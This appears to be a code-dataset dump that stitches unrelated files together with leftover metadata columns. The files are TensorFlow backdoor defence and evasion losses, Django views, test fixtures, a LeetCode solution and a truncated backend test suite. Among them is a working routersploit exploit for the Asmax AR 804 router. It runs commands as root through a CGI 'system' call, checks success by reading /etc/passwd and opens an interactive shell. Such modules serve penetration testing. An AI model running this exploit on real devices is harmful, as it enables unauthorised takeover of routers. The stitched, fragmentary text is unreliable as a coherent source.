def _triple_loss(self, logits, aux_logits, labels):
splited_labels = tf.unstack(labels, axis=1)
lambda_a = splited_labels[2]
lambda_b = 1 - lambda_a
with tf.name_scope('xentropy'):
a_cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=logits, labels=tf.to_int32(splited_labels[0]), weights=lambda_a)
b_cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=logits, labels=tf.to_int32(splited_labels[1]), weights=lambda_b)
loss = tf.reduce_mean(a_cross_entropy + b_cross_entropy, name='xentropy_mean')
if aux_logits is not None:
ct_lambda = tf.concat([tf.expand_dims(lambda_a, 1), tf.expand_dims(lambda_b, 1)], axis=1)
splited_lambda = tf.split(ct_lambda, self.options.num_slices_one_batch, axis=0)
splited_aux_logits = tf.split(aux_logits, self.options.num_slices_one_batch, axis=0)
with tf.name_scope('aux_triplet'):
for _ct_lambda, _aux_logits in zip(splited_lambda, splited_aux_logits):
cross = tf.matmul(_aux_logits, tf.transpose(_aux_logits))
square_norm = tf.diag_part(cross)
square_cross = tf.square(cross)
square_cos = tf.divide(square_cross, tf.expand_dims(square_norm, 1))
square_cos = tf.divide(square_cos, tf.expand_dims(square_norm, 0))
unstacked_sq_cos = tf.unstack(square_cos, axis=0)
sq_cos_a = tf.expand_dims(unstacked_sq_cos[0], 1)
sq_cos_b = tf.expand_dims(unstacked_sq_cos[-1], 1)
ct_sq_cos = tf.concat(axis=1, values=[sq_cos_a, sq_cos_b])
ct_cos = tf.sqrt(ct_sq_cos)
triplet_loss = ct_sq_cos - 2.0 * ct_cos * _ct_lambda + tf.square(_ct_lambda)
aux_loss = tf.reduce_mean(triplet_loss, name='aux_loss')
loss = tf.add_n([loss, aux_loss])
return loss
def _backdoor_defence_loss(self, logits, aux_logits, labels):
with tf.name_scope('xentropy'):
cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=logits, labels=labels)
loss = tf.reduce_mean(cross_entropy, name='xentropy_mean')
with tf.name_scope('aux_l1norm'):
abs_logits = tf.abs(aux_logits)
abs_sum = tf.reduce_sum(abs_logits, [1, 2, 3])
# aux_l1_norm = tf.losses.absolute_difference(labels=labels,predictions=abs_sum)
aux_loss = self.options.loss_lambda * tf.reduce_mean(abs_sum, name='aux_loss')
loss = tf.add_n([loss, aux_loss])
return loss
def _backdoor_evade_loss(self, embeddings, mask, labels):
with tf.name_scope('xentropy'):
splited_embeddings = tf.split(embeddings, self.options.batch_size, axis=0)
xSxs = []
mu = tf.constant(self.mu)
inv_Sigma = tf.constant(self.inv_Sigma)
for em in splited_embeddings:
x = em-mu
xS = tf.matmul(x, inv_Sigma)
xSx = tf.matmul(xS, tf.transpose(x))
xSxs.append(xSx)
loss = tf.reduce_mean(xSxs, name='xentropy_mean')
with tf.name_scope('aux_l1norm'):
abs_logits = tf.abs(mask)
abs_sum = tf.reduce_sum(abs_logits, [1, 2, 3])
# aux_l1_norm = tf.losses.absolute_difference(labels=labels,predictions=abs_sum)
aux_loss = self.options.loss_lambda * tf.reduce_mean(abs_sum, name='aux_loss')
loss = tf.add_n([loss, aux_loss])
return loss
def loss_function(self, inputs, build_network_result):
logits = build_network_result.logits
aux_logits = build_network_result.extra_info
labels = inputs[1]
loss = None
"""Loss function."""
if self.options.net_mode == 'normal':
loss = self._classification_loss(logits, aux_logits, labels)
elif self.options.net_mode == 'triple_loss':
loss = self._triple_loss(logits, aux_logits, labels)
elif self.options.net_mode == 'backdoor_def':
loss = self._backdoor_defence_loss(logits, aux_logits, labels)
elif self.options.net_mode == 'backdoor_eva':
loss = self._backdoor_evade_loss(logits,aux_logits,labels)
elif 'discriminator' in self.options.net_mode:
loss = self._discriminator_loss(logits,aux_logits,labels, inputs[2])
return loss
def _collect_backbone_vars(self):
bottom_vars = {}
last_affine_vars = {}
mask_vars = {}
other_vars = {}
mome_vars = {}
adam_vars = {}
discriminator_vars = {}
all_vars = tf.global_variables()
for v in all_vars:
vname = v.name.split(':')[0]
if not str.startswith(vname,'v'):
other_vars[vname] = v
continue
sv = vname.split('/')
sv[0] = 'v0'
vname = '/'.join(sv)
if 'Adam' in vname:
adam_vars[vname] = v
elif 'Momentum' in vname:
mome_vars[vname]= v
elif self.last_affine_name is not None and self.last_affine_name in vname:
last_affine_vars[vname] = v
elif 'input_mask' in vname:
mask_vars[vname] = v
elif 'discriminator' in vname:
discriminator_vars[vname] = v
else:
bottom_vars[vname] = v
li = []
load_mode = self.options.load_mode
if load_mode == 'all' or 'mask' in load_mode:
li.append(mask_vars)
if load_mode == 'all' or 'bottom' in load_mode:
li.append(bottom_vars)
if load_mode == 'all' or 'discriminator' in load_mode:
li.append(discriminator_vars)
if load_mode == 'all' or 'affine' in load_mode:
li.append(last_affine_vars)
var_list = {}
for a in li:
var_list = {**var_list, **a}
return var_list
def add_backbone_saver(self):
# Create saver with mapping from variable names in checkpoint of backbone
# model to variables in SSD model
print('===Load===')
print('add abckbone saver: '+self.options.load_mode)
backbone_var_list = self._collect_backbone_vars()
self.backbone_savers.append(tf.train.Saver(backbone_var_list))
def load_backbone_model(self, sess, backbone_model_path):
print('===Load===')
for saver in self.backbone_savers:
print('load backbone model from: '+backbone_model_path)
saver.restore(sess, backbone_model_path)
def get_input_shapes(self, subset):
if ('discriminator' in self.options.net_mode):
return [[self.batch_size, self.image_size, self.image_size,self.depth],[self.batch_size],[self.batch_size]]
return [[self.batch_size, self.image_size, self.image_size,self.depth],[self.batch_size]]
| en | 0.642581 | Build vgg architecture from blocks. # Add the final fully-connected class layer #if not self.skip_final_affine_layer(): # logits = network.affine(nclass, activation='linear') # aux_logits = None # if network.aux_top_layer is not None: # with network.switch_to_aux_top_layer(): # aux_logits = network.affine(nclass, activation='linear', stddev=0.001) # TODO(reedwm): Determine if we should do this cast here. # moving_mean & moving_variance # aux_l1_norm = tf.losses.absolute_difference(labels=labels,predictions=abs_sum) # aux_l1_norm = tf.losses.absolute_difference(labels=labels,predictions=abs_sum) Loss function. # Create saver with mapping from variable names in checkpoint of backbone # model to variables in SSD model | 2.153271 | 2 |
BestStore/master/views.py | rishabh-22/ECommerce | 0 | 6616774 | <reponame>rishabh-22/ECommerce
from django.http import HttpResponseRedirect
from django.shortcuts import render, redirect
from django.views.generic import FormView
from django.views.generic.base import View
from master.forms import ContactQueryForm
from .models import ContactQuery
def home(request):
return render(request, "master/homepage.html")
def register(request):
return render(request, "master/register.html")
def login(request):
return render(request, "master/login.html")
def render_login_form(request):
return render(request, 'master/login.html')
# def contact_us(request):
# return render(request, 'contact_us.html')
#
#
# class ContactQuery(FormView):
#
# form_class = ContactQueryForm
# template_name = 'contact_us.html'
#
# def form_valid(self, form):
# form.save()
# # return render(request, 'contact_us.html', 'form': form)
#
# def form_invalid(self, form):
# return render(self.request, self.template_name, {'form': form, 'error': form.errors})
# class ContactView(View):
#
# def get(self, request):
# form = ContactQueryForm()
# context = {'form': form}
# return render(request, 'contact_us.html', context)
#
# def post(self, request):
# form = ContactQueryForm(request.POST)
# if form.is_valid():
# form.save()
# form = ContactQueryForm()
# return render(request, 'contact_us.html', {'form': form})
# return render(request, 'contact_us.html', {'form': form})
#
def contact_us(request):
form = ContactQueryForm()
if request.method == 'POST':
form = ContactQueryForm(request.POST)
if form.is_valid():
# import pdb;pdb.set_trace()
form.save()
return HttpResponseRedirect('/contact/')
else:
form = ContactQueryForm()
return render(request, 'contact_us.html', {'form': form})
| from django.http import HttpResponseRedirect
from django.shortcuts import render, redirect
from django.views.generic import FormView
from django.views.generic.base import View
from master.forms import ContactQueryForm
from .models import ContactQuery
def home(request):
return render(request, "master/homepage.html")
def register(request):
return render(request, "master/register.html")
def login(request):
return render(request, "master/login.html")
def render_login_form(request):
return render(request, 'master/login.html')
# def contact_us(request):
# return render(request, 'contact_us.html')
#
#
# class ContactQuery(FormView):
#
# form_class = ContactQueryForm
# template_name = 'contact_us.html'
#
# def form_valid(self, form):
# form.save()
# # return render(request, 'contact_us.html', 'form': form)
#
# def form_invalid(self, form):
# return render(self.request, self.template_name, {'form': form, 'error': form.errors})
# class ContactView(View):
#
# def get(self, request):
# form = ContactQueryForm()
# context = {'form': form}
# return render(request, 'contact_us.html', context)
#
# def post(self, request):
# form = ContactQueryForm(request.POST)
# if form.is_valid():
# form.save()
# form = ContactQueryForm()
# return render(request, 'contact_us.html', {'form': form})
# return render(request, 'contact_us.html', {'form': form})
#
def contact_us(request):
form = ContactQueryForm()
if request.method == 'POST':
form = ContactQueryForm(request.POST)
if form.is_valid():
# import pdb;pdb.set_trace()
form.save()
return HttpResponseRedirect('/contact/')
else:
form = ContactQueryForm()
return render(request, 'contact_us.html', {'form': form}) | en | 0.261216 | # def contact_us(request): # return render(request, 'contact_us.html') # # # class ContactQuery(FormView): # # form_class = ContactQueryForm # template_name = 'contact_us.html' # # def form_valid(self, form): # form.save() # # return render(request, 'contact_us.html', 'form': form) # # def form_invalid(self, form): # return render(self.request, self.template_name, {'form': form, 'error': form.errors}) # class ContactView(View): # # def get(self, request): # form = ContactQueryForm() # context = {'form': form} # return render(request, 'contact_us.html', context) # # def post(self, request): # form = ContactQueryForm(request.POST) # if form.is_valid(): # form.save() # form = ContactQueryForm() # return render(request, 'contact_us.html', {'form': form}) # return render(request, 'contact_us.html', {'form': form}) # # import pdb;pdb.set_trace() | 2.079803 | 2 |
pystiche/data/__init__.py | dooglewoogle/pystiche | 129 | 6616775 | <filename>pystiche/data/__init__.py
from .collections import *
from .datasets import *
from .license import *
| <filename>pystiche/data/__init__.py
from .collections import *
from .datasets import *
from .license import *
| none | 1 | 1.032974 | 1 | |
tests/conftest.py | MapleCCC/importall | 0 | 6616776 | import os
import sys
import pytest
from .utils import mock_dict
@pytest.fixture
def mock_environment(request):
"""
Before the test runs, backup the environment.
After the test runs, restore the environment.
"""
# Reference: test.support.CleanImport() function implementation
# https://github.com/python/cpython/blob/v3.9.0/Lib/test/support/__init__.py#L1241
f_globals = request.function.__globals__
with mock_dict(f_globals, sys.modules, os.environ):
yield
| import os
import sys
import pytest
from .utils import mock_dict
@pytest.fixture
def mock_environment(request):
"""
Before the test runs, backup the environment.
After the test runs, restore the environment.
"""
# Reference: test.support.CleanImport() function implementation
# https://github.com/python/cpython/blob/v3.9.0/Lib/test/support/__init__.py#L1241
f_globals = request.function.__globals__
with mock_dict(f_globals, sys.modules, os.environ):
yield
| en | 0.704817 | Before the test runs, backup the environment. After the test runs, restore the environment. # Reference: test.support.CleanImport() function implementation # https://github.com/python/cpython/blob/v3.9.0/Lib/test/support/__init__.py#L1241 | 2.318896 | 2 |
remake_index.py | jwansek/stagit-2 | 0 | 6616777 | <reponame>jwansek/stagit-2<gh_stars>0
import subprocess
import os
initdir = os.path.join("/", "home", "git", "git")
remote_git = os.path.join("/", "media", "git")
with open(os.path.join(initdir, "private_repos.txt"), "r") as f:
private_repos = f.read().split("\n")
dirs = []
for dir_ in os.listdir(initdir):
full_dir = os.path.join(initdir, dir_)
if os.path.isdir(full_dir) and str(full_dir).endswith(".git") and dir_ not in private_repos:
dirs.append(str(os.path.join(remote_git, dir_)))
cmd = "stagit-index %s > %s" % (" ".join(dirs), str(os.path.join(remote_git, "html", "index.html")))
#print(cmd)
subprocess.run(["ssh", "git@192.168.1.92", cmd])
print("Rebuilt HTML index...")
| import subprocess
import os
initdir = os.path.join("/", "home", "git", "git")
remote_git = os.path.join("/", "media", "git")
with open(os.path.join(initdir, "private_repos.txt"), "r") as f:
private_repos = f.read().split("\n")
dirs = []
for dir_ in os.listdir(initdir):
full_dir = os.path.join(initdir, dir_)
if os.path.isdir(full_dir) and str(full_dir).endswith(".git") and dir_ not in private_repos:
dirs.append(str(os.path.join(remote_git, dir_)))
cmd = "stagit-index %s > %s" % (" ".join(dirs), str(os.path.join(remote_git, "html", "index.html")))
#print(cmd)
subprocess.run(["ssh", "git@192.168.1.92", cmd])
print("Rebuilt HTML index...") | ru | 0.466608 | #print(cmd) | 2.39098 | 2 |
invert-binary-tree.py | Hemant-60/leetcode-solutions | 0 | 6616778 | ''' https://leetcode.com/problems/invert-binary-tree/ '''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def invertTree(self, root: TreeNode) -> TreeNode:
curr=root
self.invert(curr)
return root
def invert(self,root: TreeNode):
if root is None or root.right is None and root.left is None:
return
tmp =root.left
root.left=root.right
root.right=tmp
self.invert(root.left)
self.invert(root.right)
| ''' https://leetcode.com/problems/invert-binary-tree/ '''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def invertTree(self, root: TreeNode) -> TreeNode:
curr=root
self.invert(curr)
return root
def invert(self,root: TreeNode):
if root is None or root.right is None and root.left is None:
return
tmp =root.left
root.left=root.right
root.right=tmp
self.invert(root.left)
self.invert(root.right)
| en | 0.623797 | https://leetcode.com/problems/invert-binary-tree/ # Definition for a binary tree node. # class TreeNode: # def __init__(self, val=0, left=None, right=None): # self.val = val # self.left = left # self.right = right | 4.060522 | 4 |
DIZED_APPS/INCANTATION/routersploit/modules/exploits/routers/asmax/ar_804_gu_rce.py | tanc7/ArmsCommander-TestBed | 1 | 6616779 | <gh_stars>1-10
from routersploit import (
exploits,
print_success,
print_status,
print_error,
http_request,
mute,
validators,
shell
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Asmax AR 804 Remote Code Execution vulnerability.
If the target is vulnerable, command loop is invoked that allows executing commands with root privileges.
"""
__info__ = {
'name': 'Asmax AR 804 RCE',
'authors': [
'<NAME> <michal.sajdak[at]securitum.com>', # vulnerability discovery
'<NAME> <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'description': 'Module exploits Asmax AR 804 Remote Code Execution vulnerability which '
'allows executing command on operating system level with root privileges.',
'references': [
'http://www.securitum.pl/dh/asmax-ar-804-gu-compromise',
'https://www.exploit-db.com/exploits/8846/',
],
'devices': [
'Asmax AR 804 gu',
],
}
target = exploits.Option('', 'Target URL address e.g. http://192.168.1.1', validators=validators.url) # target url address
port = exploits.Option(80, 'Target HTTP port', validators=validators.integer) # target http port
def run(self):
print_status("Checking if target is vulnerable")
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mipsbe")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def execute(self, cmd):
""" callback used by shell functionality """
url = "{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd)
response = http_request(method="GET", url=url)
if response is None:
return ""
return response.text
@mute
def check(self):
cmd = "cat /etc/passwd"
url = "{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if response.status_code == 200 and "root:" in response.text:
return True # target is vulnerable
return False # target is not vulnerable
| from routersploit import (
exploits,
print_success,
print_status,
print_error,
http_request,
mute,
validators,
shell
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Asmax AR 804 Remote Code Execution vulnerability.
If the target is vulnerable, command loop is invoked that allows executing commands with root privileges.
"""
__info__ = {
'name': 'Asmax AR 804 RCE',
'authors': [
'<NAME> <michal.sajdak[at]securitum.com>', # vulnerability discovery
'<NAME> <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'description': 'Module exploits Asmax AR 804 Remote Code Execution vulnerability which '
'allows executing command on operating system level with root privileges.',
'references': [
'http://www.securitum.pl/dh/asmax-ar-804-gu-compromise',
'https://www.exploit-db.com/exploits/8846/',
],
'devices': [
'Asmax AR 804 gu',
],
}
target = exploits.Option('', 'Target URL address e.g. http://192.168.1.1', validators=validators.url) # target url address
port = exploits.Option(80, 'Target HTTP port', validators=validators.integer) # target http port
def run(self):
print_status("Checking if target is vulnerable")
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mipsbe")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def execute(self, cmd):
""" callback used by shell functionality """
url = "{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd)
response = http_request(method="GET", url=url)
if response is None:
return ""
return response.text
@mute
def check(self):
cmd = "cat /etc/passwd"
url = "{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if response.status_code == 200 and "root:" in response.text:
return True # target is vulnerable
return False # target is not vulnerable | en | 0.75485 | Exploit implementation for Asmax AR 804 Remote Code Execution vulnerability. If the target is vulnerable, command loop is invoked that allows executing commands with root privileges. # vulnerability discovery # routersploit module # target url address # target http port callback used by shell functionality # target is not vulnerable # target is vulnerable # target is not vulnerable | 2.705768 | 3 |
tests/test_backend.py | hwipl/nuqql-based | 0 | 6616780 | <reponame>hwipl/nuqql-based
"""
Backend testing code
"""
import subprocess
import unittest
import tempfile
import shutil
import socket
import time
from pathlib import Path
from typing import Any, Optional
from nuqql_based.main import VERSION
from nuqql_based.message import Message
# default socket timeout
DEFAULT_TIMEOUT = 10
class BackendTest(unittest.TestCase):
"""
Common backend test base class
"""
# test run counter
test_run = 0
def setUp(self) -> None:
# increase test run counter
self.__class__.test_run += 1
# create temporary directory
self.test_dir = tempfile.mkdtemp()
# start backend as subprocess
self.path = Path(__file__).resolve().parents[1]
self.backend_cmd = ""
self._set_backend_cmd()
self.proc: Optional[subprocess.Popen] = None
self.proc = subprocess.Popen(self.backend_cmd, shell=True,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
# client connection
self.buf = ""
self.sock: Optional[socket.socket] = None
self._set_socket()
self.set_timeout(DEFAULT_TIMEOUT)
self.server_addr: Any = None
self._set_server_addr()
self._connect()
def _set_backend_cmd(self) -> None:
"""
Set the backend command
"""
port = 32000 + self.test_run
self.backend_cmd = f"{self.path}/based.py --dir {self.test_dir} " \
f"--af inet --port {port}"
def _set_socket(self) -> None:
"""
Set the client socket
"""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def _set_server_addr(self) -> None:
"""
Set the server address
"""
self.server_addr = ("localhost", 32000 + self.test_run)
def _connect(self) -> None:
"""
Network connection helper, tries to reach server for 5 seconds
"""
assert self.sock
tries = 0
while tries < 50:
try:
time.sleep(1)
self.sock.connect(self.server_addr)
break
except OSError:
tries += 1
def tearDown(self) -> None:
assert self.sock and self.proc
# close socket
self.sock.close()
self.sock = None
# close subprocess
self.proc.terminate()
self.proc.wait()
self.proc = None
# delete temporary directory
shutil.rmtree(self.test_dir)
def send_cmd(self, cmd: str) -> None:
"""
Send a command to the backend
"""
assert self.sock
cmd = f"{cmd}\r\n"
self.sock.sendall(cmd.encode())
def recv_msg(self) -> str:
"""
Receive a message from the backend
"""
assert self.sock
while self.buf.find("\r\n") == -1:
data = self.sock.recv(1024)
if not data:
return ""
self.buf += data.decode()
eom = self.buf.find("\r\n")
msg = self.buf[:eom]
self.buf = self.buf[eom + 2:]
return msg
def set_timeout(self, timeout: Optional[float]) -> None:
"""
Set socket timeout
"""
assert self.sock
self.sock.settimeout(timeout)
class BackendInetTest(BackendTest):
"""
Test the backend with an AF_INET socket
"""
def test_version(self) -> None:
"""
Test the version command
"""
self.send_cmd("version")
reply = self.recv_msg()
self.assertEqual(reply, f"info: version: based v{VERSION}")
def test_help(self) -> None:
"""
Test the help command
"""
self.send_cmd("help")
reply = self.recv_msg()
self.assertEqual(reply, str(Message.HELP_MSG)[:-2])
def test_bye(self) -> None:
"""
Test the bye command
"""
self.send_cmd("bye")
reply = self.recv_msg()
self.assertEqual(reply, "")
def test_quit(self) -> None:
"""
Test the bye command
"""
self.send_cmd("quit")
reply = self.recv_msg()
self.assertEqual(reply, "")
def test_accounts(self) -> None:
"""
Test account listing as well as adding and deleting of accounts
"""
# empty account list, except nothing/timeout
self.send_cmd("account list")
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
# add new account
self.send_cmd("account add test <EMAIL> testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
# retrieve account list again, should contain new account
self.send_cmd("account list")
reply = self.recv_msg()
self.assertEqual(reply, "account: 0 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
# add new account
self.send_cmd("account add test <EMAIL> test2pw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 1.")
# retrieve account list again, should contain new account
self.send_cmd("account list")
replies = []
replies.append(self.recv_msg())
replies.append(self.recv_msg())
replies.sort()
self.assertEqual(replies[0],
"account: 0 () test <EMAIL> [online]")
self.assertEqual(replies[1],
"account: 1 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
# delete first account
self.send_cmd("account 0 delete")
reply = self.recv_msg()
self.assertEqual(reply, "info: account 0 deleted.")
# retrieve account list again, should only contain second account
self.send_cmd("account list")
reply = self.recv_msg()
self.assertEqual(reply, "account: 1 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
# add another account, should get first account id
self.send_cmd("account add test <EMAIL> test3pw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
# retrieve account list again, should contain new account
self.send_cmd("account list")
replies = []
replies.append(self.recv_msg())
replies.append(self.recv_msg())
replies.sort()
self.assertEqual(replies[0],
"account: 0 () test <EMAIL> [online]")
self.assertEqual(replies[1],
"account: 1 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
def test_buddies(self) -> None:
"""
Test retrieving the buddy list and buddies adding with send
"""
# retrieve buddy list with no accounts
self.send_cmd("account 0 buddies")
reply = self.recv_msg()
self.assertEqual(reply, "error: invalid account")
# add an account
self.send_cmd("account add test <EMAIL> testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
# retrieve buddy list with empty buddy list
self.send_cmd("account 0 buddies")
reply = self.recv_msg()
self.assertEqual(reply, "info: got buddies for account 0.")
# add buddy with send and retrieve buddy list
self.send_cmd("account 0 send <EMAIL> test")
reply = self.recv_msg()
self.assertEqual(reply[:8], "message:") # test backend returns msg
self.send_cmd("account 0 buddies")
reply = self.recv_msg()
self.assertEqual(reply,
"buddy: 0 status: name: <EMAIL> alias: ")
reply = self.recv_msg()
self.assertEqual(reply, "info: got buddies for account 0.")
# add more buddies and retrieve buddy list again
self.send_cmd("account 0 send <EMAIL> test")
reply = self.recv_msg()
self.assertEqual(reply[:8], "message:") # test backend returns msg
self.send_cmd("account 0 send <EMAIL> test")
reply = self.recv_msg()
self.assertEqual(reply[:8], "message:") # test backend returns msg
self.send_cmd("account 0 buddies")
replies = []
replies.append(self.recv_msg())
replies.append(self.recv_msg())
replies.append(self.recv_msg())
replies.sort()
self.assertEqual(replies[0],
"buddy: 0 status: name: <EMAIL> alias: ")
self.assertEqual(replies[1],
"buddy: 0 status: name: <EMAIL> alias: ")
self.assertEqual(replies[2],
"buddy: 0 status: name: <EMAIL> alias: ")
reply = self.recv_msg()
self.assertEqual(reply, "info: got buddies for account 0.")
# retrieve only online buddies
self.send_cmd("account 0 buddies online")
reply = self.recv_msg()
self.assertEqual(reply, "info: got buddies for account 0.")
def test_send(self) -> None:
"""
Test sending messages
"""
# try without an account
buddy = "<EMAIL>"
self.send_cmd(f"account 0 send {buddy} this is a test!")
reply = self.recv_msg()
self.assertEqual(reply, "error: invalid account")
# add an account
user = "<EMAIL>"
self.send_cmd(f"account add test {user} testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
# try again, there should be no reply
msg = "this is a test!"
self.send_cmd(f"account 0 send {buddy} {msg}")
reply = self.recv_msg()
self.assertRegex(reply,
f"message: 0 {user} [0-9]+ {buddy} {msg.upper()}")
def test_collect(self) -> None:
"""
Test collecting old messages from history
"""
# try without an account
self.send_cmd("account 0 collect")
reply = self.recv_msg()
self.assertEqual(reply, "error: invalid account")
# add an account
self.send_cmd("account add test <EMAIL> testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
# try again, there should be no reply because history is empty
self.send_cmd("account 0 collect")
reply = self.recv_msg()
self.assertEqual(reply, "info: collected messages for account 0.")
def test_status(self) -> None:
"""
Test getting and setting the status
"""
# try without an account
self.send_cmd("account 0 status get")
reply = self.recv_msg()
self.assertEqual(reply, "error: invalid account")
self.send_cmd("account 0 status set away")
reply = self.recv_msg()
self.assertEqual(reply, "error: invalid account")
# add an account
self.send_cmd("account add test <EMAIL> testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
# get status again
self.send_cmd("account 0 status get")
reply = self.recv_msg()
self.assertEqual(reply, "status: account 0 status: online")
# set status to away
self.send_cmd("account 0 status set away")
reply = self.recv_msg()
self.assertEqual(reply, "status: account 0 status: away")
# get status again
self.send_cmd("account 0 status get")
reply = self.recv_msg()
self.assertEqual(reply, "status: account 0 status: away")
class BackendInetPushAccountsTest(BackendTest):
"""
Test the backend with an AF_INET socket and the "push accounts"
configuration setting
"""
def _set_backend_cmd(self) -> None:
"""
Set the backend command
"""
port = 33000 + self.test_run
self.backend_cmd = f"{self.path}/based.py --dir {self.test_dir} " \
f"--af inet --port {port} --push-accounts"
def _set_server_addr(self) -> None:
"""
Set the server address
"""
self.server_addr = ("localhost", 33000 + self.test_run)
def _reconnect(self) -> None:
"""
Network reconnect helper, tries to reconnect to the server
"""
self.sock.close()
self._set_socket()
self._connect()
def test_accounts(self) -> None:
"""
Test account listing and adding
"""
# test getting empty account list on connect
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
# add first account
self.send_cmd("account add test <EMAIL> testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
reply = self.recv_msg()
self.assertEqual(reply, "account: 0 () test <EMAIL> [online]")
# add another account
self.send_cmd("account add test <EMAIL> test2pw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 1.")
reply = self.recv_msg()
self.assertEqual(reply, "account: 1 () test <EMAIL> [online]")
# reconnect to the server and check new account list
self._reconnect()
reply = self.recv_msg()
self.assertEqual(reply, "account: 0 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "account: 1 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
class BackendUnixTest(BackendInetTest):
"""
Test the backend with an AF_UNIX socket
"""
def _set_backend_cmd(self) -> None:
"""
Get the backend command
"""
self.backend_cmd = f"{self.path}/based.py --dir {self.test_dir} "\
f"--af unix"
def _set_socket(self) -> None:
"""
Get the client socket
"""
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def _set_server_addr(self) -> None:
"""
Get the server address
"""
self.server_addr = str(Path(self.test_dir) / "based.sock")
if __name__ == '__main__':
unittest.main()
| """
Backend testing code
"""
import subprocess
import unittest
import tempfile
import shutil
import socket
import time
from pathlib import Path
from typing import Any, Optional
from nuqql_based.main import VERSION
from nuqql_based.message import Message
# default socket timeout
DEFAULT_TIMEOUT = 10
class BackendTest(unittest.TestCase):
"""
Common backend test base class
"""
# test run counter
test_run = 0
def setUp(self) -> None:
# increase test run counter
self.__class__.test_run += 1
# create temporary directory
self.test_dir = tempfile.mkdtemp()
# start backend as subprocess
self.path = Path(__file__).resolve().parents[1]
self.backend_cmd = ""
self._set_backend_cmd()
self.proc: Optional[subprocess.Popen] = None
self.proc = subprocess.Popen(self.backend_cmd, shell=True,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
# client connection
self.buf = ""
self.sock: Optional[socket.socket] = None
self._set_socket()
self.set_timeout(DEFAULT_TIMEOUT)
self.server_addr: Any = None
self._set_server_addr()
self._connect()
def _set_backend_cmd(self) -> None:
"""
Set the backend command
"""
port = 32000 + self.test_run
self.backend_cmd = f"{self.path}/based.py --dir {self.test_dir} " \
f"--af inet --port {port}"
def _set_socket(self) -> None:
"""
Set the client socket
"""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def _set_server_addr(self) -> None:
"""
Set the server address
"""
self.server_addr = ("localhost", 32000 + self.test_run)
def _connect(self) -> None:
"""
Network connection helper, tries to reach server for 5 seconds
"""
assert self.sock
tries = 0
while tries < 50:
try:
time.sleep(1)
self.sock.connect(self.server_addr)
break
except OSError:
tries += 1
def tearDown(self) -> None:
assert self.sock and self.proc
# close socket
self.sock.close()
self.sock = None
# close subprocess
self.proc.terminate()
self.proc.wait()
self.proc = None
# delete temporary directory
shutil.rmtree(self.test_dir)
def send_cmd(self, cmd: str) -> None:
"""
Send a command to the backend
"""
assert self.sock
cmd = f"{cmd}\r\n"
self.sock.sendall(cmd.encode())
def recv_msg(self) -> str:
"""
Receive a message from the backend
"""
assert self.sock
while self.buf.find("\r\n") == -1:
data = self.sock.recv(1024)
if not data:
return ""
self.buf += data.decode()
eom = self.buf.find("\r\n")
msg = self.buf[:eom]
self.buf = self.buf[eom + 2:]
return msg
def set_timeout(self, timeout: Optional[float]) -> None:
"""
Set socket timeout
"""
assert self.sock
self.sock.settimeout(timeout)
class BackendInetTest(BackendTest):
"""
Test the backend with an AF_INET socket
"""
def test_version(self) -> None:
"""
Test the version command
"""
self.send_cmd("version")
reply = self.recv_msg()
self.assertEqual(reply, f"info: version: based v{VERSION}")
def test_help(self) -> None:
"""
Test the help command
"""
self.send_cmd("help")
reply = self.recv_msg()
self.assertEqual(reply, str(Message.HELP_MSG)[:-2])
def test_bye(self) -> None:
"""
Test the bye command
"""
self.send_cmd("bye")
reply = self.recv_msg()
self.assertEqual(reply, "")
def test_quit(self) -> None:
"""
Test the bye command
"""
self.send_cmd("quit")
reply = self.recv_msg()
self.assertEqual(reply, "")
def test_accounts(self) -> None:
"""
Test account listing as well as adding and deleting of accounts
"""
# empty account list, except nothing/timeout
self.send_cmd("account list")
reply = self.recv_msg()
